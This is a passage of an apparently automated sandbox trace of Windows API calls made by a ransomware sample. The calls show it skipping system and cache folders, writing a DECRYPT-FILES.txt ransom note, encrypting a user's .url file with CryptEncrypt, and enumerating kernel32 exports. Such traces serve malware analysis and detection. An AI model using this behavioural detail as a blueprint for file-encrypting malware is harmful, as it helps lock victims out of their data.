lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpString2="MSN Websites\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0085.083] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpSrch="\\Program Files") returned 0x0 [0085.083] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpSrch=":\\Windows") returned 0x0 [0085.083] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpSrch="\\Games\\") returned 0x0 [0085.083] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpSrch="\\Tor Browser\\") returned 0x0 [0085.083] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpSrch="\\ProgramData\\") returned 0x0 [0085.083] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0085.084] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0085.084] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0085.084] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpSrch="\\All Users") returned 0x0 [0085.084] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpSrch="\\IETldCache\\") returned 0x0 [0085.084] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpSrch="\\Local Settings\\") returned 0x0 [0085.084] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpSrch="\\AppData\\Local") returned 0x0 [0085.084] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpSrch="AhnLab") returned 0x0 [0085.084] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0085.084] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned 53 [0085.084] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0085.084] wsprintfW (in: param_1=0x3f2e6b4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\\\jkbimi8.tmp") returned 65 [0085.084] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x410 [0085.086] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned 53 [0085.086] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0085.086] wsprintfW (in: param_1=0x3f2e6b4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\\\DECRYPT-FILES.txt") returned 71 [0085.086] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0085.086] WriteFile (in: hFile=0x414, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e6b0, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e6b0*=0x23fc, lpOverlapped=0x0) returned 1 [0085.087] CloseHandle (hObject=0x414) returned 1 [0085.087] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned 53 [0085.087] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*" [0085.087] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*", lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaee955a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaee955a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8c98 [0085.087] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.087] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaee955a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaee955a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.087] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.087] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.087] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaee955a0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaee955a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaee955a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0085.087] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0085.087] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaee955a0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaee955a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaee955a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0085.087] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0085.087] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0085.087] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0085.088] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0085.088] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0085.088] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0085.088] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0085.088] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0085.088] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0085.088] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0085.088] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0085.088] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0085.088] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0085.088] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0085.088] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0085.088] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned 53 [0085.088] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0085.088] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0085.088] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\jkbimi8.tmp" [0085.088] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.088] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0085.088] CloseHandle (hObject=0x0) returned 0 [0085.088] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.089] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN Autos.url", cAlternateFileName="MSNAUT~1.URL")) returned 1 [0085.089] lstrcmpiW (lpString1="MSN Autos.url", lpString2="DECRYPT-FILES.txt") returned 1 [0085.089] lstrcmpiW (lpString1="MSN Autos.url", lpString2="autorun.inf") returned 1 [0085.089] lstrcmpiW (lpString1="MSN Autos.url", lpString2="boot.ini") returned 1 [0085.089] lstrcmpiW (lpString1="MSN Autos.url", lpString2="desktop.ini") returned 1 [0085.089] lstrcmpiW (lpString1="MSN Autos.url", lpString2="ntuser.dat") returned -1 [0085.089] lstrcmpiW (lpString1="MSN Autos.url", lpString2="iconcache.db") returned 1 [0085.089] lstrcmpiW (lpString1="MSN Autos.url", lpString2="bootsect.bak") returned 1 [0085.089] lstrcmpiW (lpString1="MSN Autos.url", lpString2="ntuser.dat.log") returned -1 [0085.089] lstrcmpiW (lpString1="MSN Autos.url", lpString2="thumbs.db") returned -1 [0085.089] lstrcmpiW (lpString1="MSN Autos.url", lpString2="Bootfont.bin") returned 1 [0085.089] lstrlenW (lpString="MSN Autos.url") returned 13 [0085.089] lstrcmpiW (lpString1="url", lpString2="lnk") returned 1 [0085.089] lstrcmpiW (lpString1="url", lpString2="exe") returned 1 [0085.089] lstrcmpiW (lpString1="url", lpString2="sys") returned 1 [0085.089] lstrcmpiW (lpString1="url", lpString2="dll") returned 1 [0085.089] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned 53 [0085.089] lstrlenW (lpString="MSN Autos.url") returned 13 [0085.089] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0085.089] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpString2="MSN Autos.url" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url" [0085.089] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.089] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0085.090] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=133) returned 1 [0085.090] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0085.090] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0085.090] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0085.090] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0085.090] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.092] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0085.092] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0085.092] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.092] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0085.093] CloseHandle (hObject=0x42c) returned 1 [0085.093] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.093] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0085.094] CloseHandle (hObject=0x0) returned 0 [0085.094] CloseHandle (hObject=0x428) returned 1 [0085.094] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.094] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.094] GetTickCount () returned 0x114dbbf [0085.094] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.095] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0085.095] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0085.095] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.095] lstrlenA (lpString="kernel32.dll") returned 12 [0085.095] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0085.095] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0085.095] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0085.095] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0085.095] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0085.095] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0085.096] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0085.096] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0085.096] lstrlenA (lpString="ADDATOMA") returned 8 [0085.096] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0085.096] lstrlenA (lpString="ADDATOMW") returned 8 [0085.096] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0085.096] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0085.096] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0085.096] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0085.096] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0085.096] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0085.096] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0085.096] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0085.096] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0085.096] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0085.096] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0085.096] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0085.096] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0085.096] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0085.096] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0085.096] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0085.096] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0085.096] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0085.096] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0085.096] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0085.096] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0085.096] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0085.096] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0085.096] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0085.096] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0085.096] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0085.096] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0085.096] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0085.096] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0085.096] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0085.096] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0085.096] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0085.097] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0085.097] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0085.097] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0085.097] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0085.097] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0085.097] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0085.097] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0085.097] lstrlenA (lpString="BACKUPREAD") returned 10 [0085.097] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0085.097] lstrlenA (lpString="BACKUPSEEK") returned 10 [0085.097] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0085.097] lstrlenA (lpString="BACKUPWRITE") returned 11 [0085.097] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0085.097] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0085.097] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0085.097] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0085.097] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0085.097] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0085.097] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0085.097] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0085.097] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0085.097] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0085.097] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0085.097] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0085.097] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0085.097] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0085.097] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0085.097] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0085.097] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0085.097] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0085.097] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0085.097] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0085.097] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0085.097] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0085.097] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0085.097] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0085.098] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0085.098] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0085.098] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0085.098] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0085.098] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0085.098] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0085.098] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0085.098] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0085.098] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0085.098] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0085.098] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0085.098] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0085.098] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0085.098] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0085.098] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0085.098] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0085.098] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0085.098] lstrlenA 